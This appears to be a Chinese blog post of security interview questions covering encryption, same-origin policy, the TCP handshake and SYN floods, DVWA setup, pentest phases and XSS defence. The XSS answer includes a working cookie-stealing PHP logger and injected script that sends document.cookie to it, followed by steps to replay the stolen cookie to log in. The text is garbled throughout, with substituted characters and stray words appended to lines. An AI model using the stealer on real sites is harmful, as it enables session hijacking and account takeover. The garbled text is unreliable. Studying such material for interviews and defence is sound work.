上网过滤软件测试面试,笔试题————一、网络安全、Web安全、渗透测试笔试总结...

无心中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给你们。教程不只是零基础,通俗易懂,小白也能学,并且很是风趣幽默,还时不时有内涵段子,像看小说同样,哈哈~我正在学习中,以为太牛了,因此分享给你们。点这里能够跳转到教程!php

本篇文章主要涉及一下几个方面:html

对称加密非对称加密?

什么是同源策略?

cookie存在哪里?能够打开吗

xss如何盗取cookie?

tcp、udp的区别及tcp三次握手,syn攻击?

证书要考哪些?

DVWA是如何搭建的?

渗透测试的流程是什么

xss如何防护

IIS服务器应该作哪些方面的保护措施:

虚拟机的几种链接方式及原理

xss有cookie必定能够无用户名密码登陆吗?

对称加密 非对称加密?

对称加密:加解密用同一密钥,密钥维护复杂n(n-1)/2,不适合互联网传输密钥,加解密效率高。应用于加密数据。

非对称加密:公钥推不出私钥,每一个用户一个非对称密钥对就能够,适合于互联网传输公钥,可是加密效率低,应用于数字签名及加密。前端

什么是同源策略?java

为了防止不一样域在用户浏览器中彼此干扰,浏览器对从不一样来源(域)收到的内容进行隔离。

浏览器不容许任何旧有脚本访问一个站点的cookie,不然,会话容易被劫持。mysql

只有发布cookie的站点可以访问这些cookie,只有经过该站点返回的页面所包含或加载的JavaScript才能访问cookie。sql

cookie存在哪里?能够打开吗apache

C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies

工具--文件夹选项--查看--将隐藏被保护的文件的对勾去掉就会看到cookies文件夹。浏览器

xss如何盗取cookie?安全

攻击者代码:服务器

$cookie=$_GET['cookie'];

$time=date('Y-m-d g:i:s');

$referer=getenv('HTTP_REFERER');

$cookietxt=fopen('cookie.txt','a');

fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer.""); 注意双引号,容易出错

fclose($cookietxt);

?>

脚本端:

document.write('cookie.php?cookie='+document.cookie+'');

获取到cookie后,用firebug找到cookie,新建cookie

加入cookie,用referer来提交,无需输入账号密码直接登陆进去!

tcp、udp的区别及tcp三次握手,syn攻击?

1、tcp、udp区别

TCP的优势:

可靠,稳定

TCP的可靠体如今TCP在传递数据以前,会有三次握手来创建链接,并且在数据传递时,有确认、窗口、重传、拥塞控制机制,在数据传完后,还会断开链接用来节约系统资源。

TCP的缺点:

慢,效率低,占用系统资源高,易被攻击

TCP在传递数据以前,要先建链接,这会消耗时间,并且在数据传递时,确认机制、重传机制、拥塞控制机制等都会消耗大量的时间,并且要在每台设备上维护全部的传输链接,事实上,每一个链接都会占用系统的CPU、内存等硬件资源。

并且,由于TCP有确认机制、三次握手机制,这些也致使TCP容易被人利用,实现DOS、DDOS、CC等攻击。

UDP的优势:

快,比TCP稍安全

UDP没有TCP的握手、确认、窗口、重传、拥塞控制等机制,UDP是一个无状态的传输协议,因此它在传递数据时很是快。没有TCP的这些机制,UDP较TCP被攻击者利用的漏洞就要少一些。但UDP也是没法避免攻击的,好比:UDP Flood攻击……

UDP的缺点:

不可靠,不稳定

由于UDP没有TCP那些可靠的机制,在数据传递时,若是网络质量很差,就会很容易丢包。

基于上面的优缺点,那么:

何时应该使用TCP:

当对网络通信质量有要求的时候,好比:整个数据要准确无误的传递给对方,这每每用于一些要求可靠的应用,好比HTTP、HTTPS、FTP等传输文件的协议,POP、SMTP等邮件传输的协议。

在平常生活中,常见使用TCP协议的应用以下:

浏览器,用的HTTP

FlashFXP,用的FTP

Outlook,用的POP、SMTP

Putty,用的Telnet、SSH

QQ文件传输

…………

何时应该使用UDP:

当对网络通信质量要求不高的时候,要求网络通信速度能尽可能的快,这时就可使用UDP。

好比,平常生活中,常见使用UDP协议的应用以下:

QQ语音

QQ视频

TFTP

2、TCP握手协议

在TCP/IP协议中,TCP协议提供可靠的链接服务,采用三次握手创建一个链接。

第一次握手:创建链接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认;

第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时本身也发送一个SYN包(syn=k),

即SYN+ACK包,此时服务器进入SYN_RECV状态;

第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包发送完毕,

客户端和服务器进入ESTABLISHED状态,完成三次握手。

完成三次握手,客户端与服务器开始传送数据,在上述过程当中,还有一些重要的概念:

未链接队列:在三次握手协议中,服务器维护一个未链接队列,该队列为每一个客户端的SYN包(syn=j)开设一个条目,

该条目代表服务器已收到SYN包,并向客户发出确认,正在等待客户的确认包。这些条目所标识的链接在服务器处于Syn_RECV状态,

当服务器收到客户的确认包时,删除该条目,服务器进入ESTABLISHED状态。backlog参数:表示未链接队列的最大容纳数目。

SYN-ACK重传次数 服务器发送完SYN-ACK包,若是未收到客户确认包,服务器进行首次重传,等待一段时间仍未收到客户确认包,

进行第二次重传,若是重传次数超过系统规定的最大重传次数,系统将该链接信息从半链接队列中删除。注意,每次重传等待的时间不必定相同。

半链接存活时间:是指半链接队列的条目存活的最长时间,也即服务从收到SYN包到确认这个报文无效的最长时间,

该时间值是全部重传请求包的最长等待时间总和。有时咱们也称半链接存活时间为Timeout时间、SYN_RECV存活时间。

3、SYN攻击原理

SYN攻击属于DOS攻击的一种,它利用TCP协议缺陷,经过发送大量的半链接请求,耗费CPU和内存资源。

SYN攻击除了能影响主机外,还能够危害路由器、防火墙等网络系统,事实上SYN攻击并无论目标是什么系统,

只要这些系统打开TCP服务就能够实施。从上图可看到,服务器接收到链接请求(syn=j),

将此信息加入未链接队列,并发送请求包给客户(syn=k,ack=j+1),此时进入SYN_RECV状态。

当服务器未收到客户端的确认包时,重发请求包,一直到超时,才将此条目从未链接队列删除。

配合IP欺骗,SYN攻击能达到很好的效果,一般,客户端在短期内伪造大量不存在的IP地址,

向服务器不断地发送syn包,服务器回复确认包,并等待客户的确认,因为源地址是不存在的,

服务器须要不断的重发直至超时,这些伪造的SYN包将长时间占用未链接队列,正常的SYN请求被丢弃,

目标系统运行缓慢,严重者引发网络堵塞甚至系统瘫痪。

证书要考哪些?

信息安全国际第一认证——CISSP

信息安全国内认证——CISAW

信息安全国内认证——CISP

信息安全技术实操认证新贵——Security+

IT审计人员的必备之证——CISA

DVWA是如何搭建的?

启动xampp(XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包。)下的apache中间件和mysql

将dvwa放到xampp下的htdocs目录下

在浏览器输入http://127.0.0.1/dvwa便可使用啦!

还有owasp的漏洞练习平台:https://sourceforge.net/projects/owaspbwa/files/

渗透测试的流程是什么

渗透测试流程概述

前期交互阶段、情报搜集阶段、威胁建模阶段、漏洞分析阶段、

渗透攻击阶段(Exploitation)、后渗透攻击阶段(怎么一直控制,维持访问)、报告阶段。

攻击前:网络踩点、网络扫描、网络查点

攻击中:利用漏洞信息进行渗透攻击、获取权限

攻击后:后渗透维持攻击、文件拷贝、木马植入、痕迹擦除

xss如何防护

1.对前端输入作过滤和编码:

好比只容许输入指定类型的字符,好比电话号格式,注册用户名限制等,输入检查须要在服务器端完成,在前端完成的限制是容易绕过的;

对特殊字符进行过滤和转义;

2.对输出作过滤和编码:在变量值输出到前端的HTML时进行编码和转义;

3.给关键cookie使用http-only

IIS服务器应该作哪些方面的保护措施:

整理来源:http://www.williamlong.info/archives/118.html

1.保持Windows升级:

2.使用IIS防范工具

3.移除缺省的Web站点

4.若是你并不须要FTP和SMTP服务,请卸载它们

5.有规则地检查你的管理员组和服务:

6.严格控制服务器的写访问权限

7.设置复杂的密码

8.减小/排除Web服务器上的共享

9.禁用TCP/IP协议中的NetBIOS:

10.使用TCP端口阻塞

11.仔细检查*.bat和*.exe文件:每周搜索一次*.bat

12.管理IIS目录安全:

13.使用NTFS安全:

14.管理用户帐户

15.审计你的Web服务器:

虚拟机的几种链接方式及原理

安装完虚拟机后,默认安装了两个虚拟网卡,VMnet1和VMnet8,其余的未安装(固然也能够手动安装其余的)。其中VMnet1是host网卡,

用于host方式链接网络的。VMnet8是NAT网卡,用于NAT方式链接网络的。它们的IP地址是随机生成的,若是要用虚拟机作实验的话,

最好将VMnet1到VMnet8的IP地址改掉。习惯上把VMware虚拟网卡使用的网段"固定",使用以下原则:VMnet1对应的网段是192.168.10.0,

VMnet2对应的网段是192.168.20.0,其余的相似。固然日常只是随便用用的就不用改了,能上网就好了。

VMware网络链接的方式主要有:桥接(Bridged)、NAT、主机网络(Host-Only)。

1. Use bridged networking(使用桥接网络)

说明:使用VMnet0虚拟交换机,此时虚拟机至关与网络上的一台独立计算机与主机同样,拥有一个独立的IP地址,

其网络拓扑如图1所示,使用桥接方式,A,A1,A2,B可互访。

20650bd444b2567d3c6dc2c25715b8bb.png

2. Use network addresstranslation(NAT)

说明:使用Vmnet8虚拟交换机,此时虚拟机能够经过主机单向网络上的其余工做站,其余工做站不能访问虚拟机。

其网络拓扑如图2所示,使用NAT方式,A1,A2能够访问B,但B不能够访问A1,A2。但A,A1,A2能够互访。

48196f1c0e3a9268d8cfcc3330a640c4.png

3. Use Host-Only networking(使用主机网络)

说明:使用Vmnet1虚拟交换机,此时虚拟机只能与虚拟机、主机互访。也就是不能上Internet,其网络拓扑如图3所示,

使用Host方式,A,A1,A2能够互访,但A1,A2不能访问B,也不能被B访问。

7d2617d8cbbcbf03a3712cb60e31d5f4.png

xss有cookie必定能够无用户名密码登陆吗?

基本能够。由于把cookie的值给浏览器,浏览器去访问页面会用已有的cookie去访问,若是cookie有效,就会直接进去。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值